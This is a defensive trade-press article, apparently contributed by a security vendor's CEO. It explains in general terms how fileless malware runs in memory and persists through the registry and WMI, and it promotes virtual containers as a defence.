Defending against fileless malware

Cyber attackers are aware of the difficulties defenders have in fighting the phenomenon of fileless malware, and are concentrating much of their efforts on further developing this type of attack. Fileless attacks increased significantly throughout 2016 and are still on the rise.

Understanding fileless malware

To start, “fileless malware” is a bit of a misnomer, since it’s not always completely fileless. Various other names have been suggested, including “bodiless malware,” “non-malware attacks,” advanced volatile threats (AVTs) and “living off the land” attacks. However, fileless malware seems to have become the accepted term, so we’ll stick with that.

Fileless malware is not unique in how it gains its foothold on endpoints. As with conventional malware, possible entry vectors include email attachments such as Office files with macros, malicious websites with Flash or streaming video, and other file-based or fileless data entering computers.

>See also: Could smart city malware be spread via motorways and highways?

Fileless malware is also not unique in its methods of attack or the effects of attack, which like conventional malware can include destruction of valuable resources, installation of spyware that steals sensitive information, or planting ransomware that encrypts and blocks access to important information.

What characterises fileless malware and makes it different from conventional malware is that it doesn’t include any of its own malicious files, executable or otherwise, to be saved on infected endpoints.

Instead, it exists primarily as code running in computer memory (RAM). The malicious code is injected into and run by various combinations of legitimate processes such as Windows PowerShell, JavaScript, WMI, Meterpreter, Mimikatz and other administrative and generally non-malicious software. And if the initial foothold was gained with something saved to disk, once the malware is running it can delete anything incriminating. Since standard anti-malware endpoint security products work by scanning endpoint file systems and processes, there’s nothing distinctive to be found and identified as malware.

Fileless malware has existed for almost 20 years, but until recently had one significant built-in weakness; since nothing was saved, the code was easily removed by a simple reboot. However, beginning in 2014 attackers have been developing sophisticated methods for achieving fileless malware persistence. These include:

Windows registry: The malware saves one or more registry keys that upon boot start legitimate services running malicious code. The registry keys are of course themselves saved to disk, but the code is well hidden in legitimate-seeming contexts, may be in randomised addresses, and may be encrypted.

>See also: Cyber criminals use fake telecom stations to spread malware

WMI (Windows Management Instrumentation): The malware saves malicious code to WMI’s CIM repository that upon boot starts legitimate services with malicious code. The CIM repository is itself saved to disk, but the code is well hidden.

Reinfection: The malware propagates across servers with high uptime, so that after reboot a server is likely to be reinfected.

In many cases, sophisticated attackers take existing conventional malware and create new, fileless variants. Thanks to these methods, organisations are now faced with persistent, fileless malware, capable of a variety of attack types, that conventional security solutions cannot intercept and remove. Some notable recent examples include Powerliks, Kovter, Duqu 2.0, POSHSPY and WMIGhost.

Defence options

Once a fileless attack is known to exist, forensic analysts can use sophisticated tools to track and remove malicious code. However, it is almost impossible for conventional automated solutions to find and identify fileless malware.

Some cyber security companies are attempting to apply behavioural and statistical analysis to identify malicious behaviour rather than the malicious code itself. It is not clear whether in fact attack behaviour can be reliably differentiated from legitimate behaviour; in any case, this approach is still limited in its ability to anticipate new attack vectors.

>See also: New malware represents biggest threat to critical infrastructure

Far more effective would be a container-based solution – creating a virtual wall between systems and threats that cannot be easily compromised (unlike sandboxes, which are often vulnerable to zero-day threats).

A container-based defense installed on organisational endpoints could examine all processes that could access external, untrusted sources such as the internet. Those processes are kept in the container, along with any data they download or save, including registry settings. At the same time, only uncontained processes can access trusted organisational resources.

For example, a browser session that tries to access a malicious site would stay in contained memory, and a malicious email attachment would be opened in contained memory. The container would prevent many types of potentially dangerous administrative commands from running, such as WMI and Powershell networking commands; and even in the unlikely event that some malicious code manages to run in the container, the container is periodically wiped along with any registry settings saved to the container’s virtual copy of the registry.

>See also: 0

Under this system, contained processes also use separate networks, enforced by organisational proxy, eliminating the possibility of propagation through the organisation. As threats grow, endpoints become more vulnerable – the most vulnerable part of an organisation. And the rise of fileless malware will make those threats even more acute; how can you fight an entity you can’t even see?

Virtual containers are the answer; and by using them, it won’t matter what kind of malware endpoints may become infected with – file-based, fileless, or some new kind that we haven’t seen yet. Anything that comes into contact with untrusted sources is isolated from anything important, and periodically wiped clean.


Sourced by Israel Levy, CEO of BUFFERZONE


The UK’s largest conference for tech leadership, TechLeaders Summit, returns on 14 September with 40+ top execs signed up to speak about the challenges and opportunities surrounding the most disruptive innovations facing the enterprise today. Secure your place at this prestigious summit byregistering here

Avatar photo

Nick Ismail

Nick Ismail is a former editor for Information Age (from 2018 to 2022) before moving on to become Global Head of Brand Journalism at HCLTech. He has a particular interest in smart technologies, AI and...

Related Topics

Virtual Containers